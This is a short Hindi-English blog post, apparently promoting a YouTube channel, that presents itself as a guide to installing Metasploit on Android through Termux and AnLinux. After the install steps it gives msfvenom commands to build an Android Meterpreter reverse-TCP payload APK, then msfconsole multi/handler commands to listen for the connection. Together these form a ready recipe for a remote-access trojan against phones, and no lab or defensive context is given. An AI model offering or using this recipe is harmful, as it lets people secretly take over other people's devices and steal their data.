how to install metasploit framework in any device

metasploit installation commons part 2
1.  open anlinux apk
2. go to dashboard
3. click choose and select Kali
4. copy
5. launch
6. paste link in termux and enter
7. ./start-kali.sh
8. apt-get update
9. apt-get install metasploit-framework
10. msfconsole

11. msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R> payload.apk

(Note:- payload create hone ke bad vah termux ke root directory main save ho jayega vaha se isko sdcard main save kar le root directory me Jane ke commond ka link
)

12. use exploit/multi/handler

13. set payload android/meterpreter/reverse_tcp

14. set lhost (your IP)

15. set lport 4444

16. exploit
Metasploit installation ka video



Metasploit installation text file link







thanks for watching

subscribe jeejoke on YouTube
If you want to install metasploit in termux so


Post a Comment

0 Comments